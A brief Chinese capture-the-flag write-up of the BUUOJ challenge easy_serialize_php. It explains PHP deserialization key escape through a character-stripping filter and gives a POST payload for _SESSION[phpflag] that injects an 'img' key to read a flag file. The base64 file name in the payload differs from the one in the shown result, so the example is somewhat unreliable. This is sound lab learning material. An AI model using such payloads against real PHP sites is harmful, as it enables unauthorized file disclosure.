BUUOJ刷题记录 [安洵杯 2019]easy_serialize_php
前面的略了,主要看最后的键值逃逸。
filter会将非法字符全部替换为空,这意味着可以构造特定的字符串进行逃逸。
payload
_SESSION[phpflag]=;s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
在经过
extract($_POST);
处理后变成
"a:2:{s:7:"";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mbGxsbGxsYWc=";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}"
右花括号后面的被抛弃,从而实现绕过。